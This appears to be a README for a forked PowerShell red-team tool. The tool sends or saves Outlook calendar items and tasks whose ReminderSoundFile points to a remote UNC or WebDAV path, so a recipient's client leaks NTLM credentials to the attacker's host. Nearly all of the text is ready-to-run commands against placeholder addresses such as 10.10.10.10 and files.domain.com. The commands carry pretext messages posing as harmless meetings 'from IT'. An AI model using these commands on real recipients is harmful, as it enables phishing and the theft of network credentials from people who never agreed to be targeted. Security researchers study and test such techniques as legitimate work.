Forking the great work and PowerShell Script by @Oddvarmoe/api0cradle to add Task Sending/Saving functionality Original documentation by @oodvarmoe with some updates below:
Script functions to either send or save a calendar or task for NTLM leakage using the ReminderSoundFile option. Run script to load the functions in Powershell, then you can use the examples below as a starting point for using the functions. Requires to be run on a Windows machine with Outlook installed since it uses the Outlook COM object to send emails. Note that it will send the email from the email account associated with Outlook. The current functions will add the meeting start time as of when the script is execute and set it to last 2 hours. When using the Save functionality, the items get stored in Oulook.
Sending:
Send-CalendarNTLMLeak -recipient "user.name@exampledomain.com" -remotefilepath "\\10.10.10.10\notexists\file.wav" -subject "Test Meeting" -body "Just a test meeting from IT, can be deleted"
Send-CalendarNTLMLeak -recipient "user.name@exampledomain.com" -remotefilepath "\\files.domain.com\notexists\file.wav" -subject "Test Meeting" -body "Just a test meeting from IT, can be deleted"
Send-CalendarNTLMLeak -recipient "user.name@exampledomain.com" -remotefilepath "\\files.domain.com@80\notexists\file.wav" -subject "Test Meeting" -body "Just a test meeting from IT, can be deleted"
Send-CalendarNTLMLeak -recipient "user.name@exampledomain.com" -remotefilepath "\\files.domain.com@SSL@443\notexists\file.wav" -subject "Test Meeting" -body "Just a test meeting from IT, can be deleted"
Send-TaskNTLMLeak -recipient "user.name@exampledomain.com" -remotefilepath "\\10.10.10.10\notexists\file.wav" -subject "Test Task" -body "Just a test task from IT, can be deleted"
Send-TaskNTLMLeak -recipient "user.name@exampledomain.com" -remotefilepath "\\files.domain.com\notexists\file.wav" -subject "Test Task" -body "Just a test task from IT, can be deleted"
Send-TaskNTLMLeak -recipient "user.name@exampledomain.com" -remotefilepath "\\files.domain.com@80\notexists\file.wav" -subject "Test Task" -body "Just a test task from IT, can be deleted"
Send-TaskNTLMLeak -recipient "user.name@exampledomain.com" -remotefilepath "\\files.domain.com@SSL@443\notexists\file.wav" -subject "Test Task" -body "Just a test task from IT, can be deleted"
Saving:
Save-CalendarNTLMLeak -remotefilepath "\\10.10.10.10\notexists\file.wav" -subject "Test Meeting" -body "Just a test meeting from IT, can be deleted"
Save-CalendarNTLMLeak -remotefilepath "\\files.domain.com\notexists\file.wav" -subject "Test Meeting" -body "Just a test meeting from IT, can be deleted"
Save-CalendarNTLMLeak -remotefilepath "\\files.domain.com@80\file.wav" -subject "Test Meeting" -body "Just a test meeting from IT, can be deleted"
Save-CalendarNTLMLeak -remotefilepath "\\files.domain.com@SSL@443\file.wav" -subject "Test Meeting" -body "Just a test meeting from IT, can be deleted"
Save-TaskNTLMLeak -remotefilepath "\\10.10.10.10\notexists\file.wav" -subject "Test Task" -body "Just a test task from IT, can be deleted"
Save-TaskNTLMLeak -remotefilepath "\\files.domain.com\notexists\file.wav" -subject "Test Task" -body "Just a test task from IT, can be deleted"
Save-TaskNTLMLeak -remotefilepath "\\files.domain.com@80\file.wav" -subject "Test Task" -body "Just a test task from IT, can be deleted"
Save-TaskNTLMLeak -remotefilepath "\\files.domain.com@SSL@443\file.wav" -subject "Test Task" -body "Just a test task from IT, can be deleted"
Hack the Planet!